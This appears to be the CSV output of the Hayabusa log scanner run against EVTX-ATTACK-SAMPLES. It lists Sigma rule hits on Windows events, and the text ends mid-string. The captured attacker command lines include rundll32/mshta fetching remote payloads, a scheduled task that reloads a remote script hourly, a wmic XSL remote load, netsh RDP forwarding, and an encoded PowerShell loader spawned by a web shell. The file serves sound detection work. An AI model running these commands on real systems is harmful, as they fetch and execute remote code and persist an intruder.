"";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Suspicious MSHTA Process 
Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:59.769 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR ""mshta.exe https://hotelesms.com/Injection.txt"" /F : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:59.769 +09:00,IEWIN7,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:59.769 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 13:02:11.307 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:1600 CREDAT:275470 /prefetch:2",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx +2019-05-24 01:49:05.736 +09:00,IEWIN7,1,informational,Process Creation,"Command: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:07.731 +09:00,IEWIN7,11,high,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:08.422 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:50:44.582 +09:00,IEWIN7,1,informational,Process Creation,Command: wmiadap.exe /F /T /R : Path: C:\Windows\System32\wbem\WMIADAP.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 02:26:08.716 +09:00,IEWIN7,1,informational,Process Creation,"Command: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat : Path: \\vboxsrv\HTools\msxsl.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-24 02:26:08.716 +09:00,IEWIN7,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-24 02:26:09.437 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-24 02:45:34.538 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 02:46:04.671 +09:00,IEWIN7,1,informational,Process Creation,"Command: netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5 : Path: C:\Windows\System32\netsh.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 02:46:04.671 +09:00,IEWIN7,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 02:46:04.671 +09:00,IEWIN7,1,high,Netsh RDP Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd_3389.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 10:33:53.112 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\windows\system32\cmd.exe"" /c net user : Path: C:\Windows\System32\cmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.112 +09:00,IEWIN7,1,high,Shells Spawned by Web Servers,,rules/sigma/process_creation/win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.122 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.182 +09:00,IEWIN7,1,informational,Process Creation,"Command: net user : Path: C:\Windows\System32\net.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""c:\windows\system32\cmd.exe"" /c net user",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.192 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\net1 user : Path: C:\Windows\System32\net1.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: net user,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-26 13:01:42.385 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" : Path: C:\Users\IEUser\Desktop\info.rar\jjs.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:42.966 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" : Path: C:\Users\IEUser\Desktop\info.rar\jjs.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\svchost.exe : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
""C:\Users\IEUser\Desktop\info.rar\jjs.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,critical,Suspect Svchost Activity,,rules/sigma/process_creation/win_susp_svchost_no_cli.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-27 00:47:56.667 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\System32\notepad.exe : Path: C:\Windows\System32\notepad.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:56.667 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:56.727 
+09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:57.628 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,Notepad Making 
Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:00.752 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:01.864 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,low,Non Interactive 
PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Shells Spawned by Web Servers,,rules/sigma/process_creation/win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.000 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\InetSRV\appcmd.exe"" list vdir /text:physicalpath : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.110 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppools /text:name : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZ
